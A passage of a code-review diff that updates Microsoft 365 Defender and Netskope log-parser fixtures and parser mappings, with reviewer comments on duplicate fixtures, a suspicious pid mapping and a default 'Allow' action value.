+ "EmailLanguage": "en",
+ "OrgLevelAction": "Allow",
+ "OrgLevelPolicy": "Connection policy",
+ "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef",
+ "SenderFromDomain": "test.fr",
+ "UrlCount": 0
+ }
+ },
+ "email": {
+ "direction": "inbound",
+ "from": {
+ "address": [
+ "john.doe@test.fr"
+ ]
+ },
+ "local_id": "12345678-1234-abcd-ef90-abcdef123456",
+ "message_id": "<20241028141819.43623347A8F@test.fr>",
+ "subject": "EMAIL Subject",
+ "to": {
+ "address": [
+ "alan.smithee@test.fr"
+ ]
+ }
+ },
+ "microsoft": {
+ "defender": {
+ "report": {
+ "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ]
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
index f2ac938fb..122a2bc61 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
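Review bot: This fixture is a near copy of test_email_delivered.json — same `DeliveryAction`, `OrgLevelAction`, `EmailDirection`, null `ThreatTypes`/`DetectionMethods` and identical `AuthenticationDetails` — so it exercises the same parser branch and asserts the same `event.category`/`event.type` values, differing only in identifiers, addresses and timestamps. A second fixture adds coverage when it varies a field the mapping branches on, for example an `OrgLevelAction` other than `Allow`, a non-null `ThreatTypes`, or `SenderIPv6` set with `SenderIPv4` null, since the `source.ip`/`related.ip` mapping for an IPv6 sender is not tested by either file. If the two files are meant to stay as they are, a file name that states what varies would be clearer than the `2` suffix.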
@@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", 
\"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "action": "Moved to quarantine", "category": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json index de75ec66d..0948ffe48 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json 
@@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", 
\"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": 
\"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "iam" diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 3a5d48cd4..2f5082094 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json 
@@ -55,30 +55,36 @@ "-F", "smtpd_tls_protocols\\commandtest" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "grep -F smtpd_tls_protocols\\commandtest", - "executable": "/usr/test/platform-python3.6", - "hash": { - "md5": "eeeee2999444ddaaaaa08598b06eafe7", - "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", - "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" - }, - "name": "platform-python3.6", + "name": "grep", "parent": { + "args": [ + "--register", + "/usr/lib/python3.6/run.py" + ], + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "executable": "/usr/test/platform-python3.6", + "hash": { + "md5": "eeeee2999444ddaaaaa08598b06eafe7", + "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", + "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" + }, "name": "platform-python3.6", - "pid": 408229, - "start": "2024-09-24T14:17:34.790000Z" + "pid": 408996, + "start": "2024-09-24T14:18:11.850000Z", + "user": { + "domain": "testdomain", + "name": "testaccount" + }, + "working_directory": "/usr/test" }, "pid": 408996, "start": "2024-09-24T14:18:11.864114Z", - "user": { - "domain": "testdomain", - "name": "testaccount" - }, - "working_directory": "/usr/test" + "working_directory": "/usr/bin" }, "related": { "hash": [ diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 1c33c07bc..b4606f079 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml 
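Review bot: The new expected output pins `"pid": 408996` for both `process.parent` (added in this hunk) and the process itself (the unchanged context line just below it), with start times about 14 ms apart; that is plausible if the fixture describes an exec-in-place, but it is also exactly what a swapped ProcessId/InitiatingProcessId mapping would produce, so it is worth confirming against the input message, which lies outside this hunk. If the parent really is the Python interpreter that launched `grep`, the parent pid should differ from the child's and the fixture (or the parser) needs correcting. The `related.hash` array that follows the hunk is cut off here, so I cannot tell whether it still lists the hashes that are now attached only to the parent.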
@@ -37,6 +37,7 @@ stages: observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" event.action: "{{parsed_event.message.activity}}" + action.name: "{{parsed_event.message.action or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" @@ -92,6 +93,9 @@ stages: - set: file.path: "{{parsed_event.message.file_path}}" filter: '{{parsed_event.message.file_path not in [None, "", "NA"]}}' + - set: + file.size: "{{parsed_event.message.file_size}}" + filter: "{{parsed_event.message.file_size not in [None, 0]}}" - translate: dictionary: "yes": "alert" diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index 67944d71d..c564471d7 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T00:29:01Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 79f08033a..952e5c0b6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a05a5c15..05b0456e2 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json 
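Review bot: `action.name: "{{parsed_event.message.action or 'Allow'}}"` in the first hunk synthesizes an `Allow` verdict whenever the vendor field is absent or empty, so events that carry no action at all are labelled as allowed; the fixture updates in this commit assert `"action": {"name": "Allow"}` for test_audit_log_login_failed.json and for the new nspolicy_upload fixture whose input has `\"action\":\"\"`. For a detection pipeline a fabricated allow verdict is worse than no value, since a rule keyed on `action.name` would treat failed logins and audit changes as allowed activity. The default also mixes cases with the vendor-supplied values the same fixtures pin (`block`, `useralert`, `Detection` alongside `Allow`), which makes matching on the field fragile. I would move the field to its own guarded stage, mirroring the `file.path` stage in the second hunk: `- set:` / `    action.name: "{{parsed_event.message.action}}"` / `  filter: '{{parsed_event.message.action not in [None, ""]}}'`. The enclosing `set` stage of the first hunk begins outside the hunk.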
+++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T12:20:31Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 1b4d67977..cf808efde 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-12-22T16:38:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 8b4635920..fb06271d6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-12-07T10:46:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index b06db05ac..667c5755e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 29f3c0723..996cd6263 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json 
@@ -19,6 +19,9 @@ ] }, "@timestamp": "2022-12-21T16:12:20Z", + "action": { + "name": "Allow" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 66c901c90..b3cb772d3 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2023-01-31T08:11:53Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "example.org" @@ -30,7 +33,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "mime_type": "eicar.txt" + "mime_type": "eicar.txt", + "size": 19154 }, "http": { "request": { diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 63497504d..e1a0a66c5 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:12:08Z", + "action": { + "name": "Detection" + }, "destination": { "address": "5.6.7.8", "bytes": 0, @@ -36,7 +39,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "name": "eicarcom2.zip" + "name": "eicarcom2.zip", + "size": 308 }, "host": { "name": "MacBook Pro", diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json new file mode 100644 index 000000000..404b5d4ab --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json 
@@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\"
:0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 
13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_t
ype\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "event": { + "action": "Browse", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:01:32Z", + "action": { + "name": "block" + }, + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "San Francisco", + "country_iso_code": "US", + "location": { + "lat": 37.775699615478516, + "lon": -122.39520263671875 + }, + "postal_code": "N/A", + "region_name": "California", + "timezone": "America/Los_Angeles" + }, + "ip": "1.2.3.4" + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 11", + "platform": "windows", + "type": "windows", + "version": "Windows NT 11.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "General", + "name": "DNS Over HTTPS" + }, + "ccl": "unknown" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "99999999999999999999999999999999 2024-10-30 13:52:18.401518", + "name": "Block DoH - incompatibility with Netskope" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 
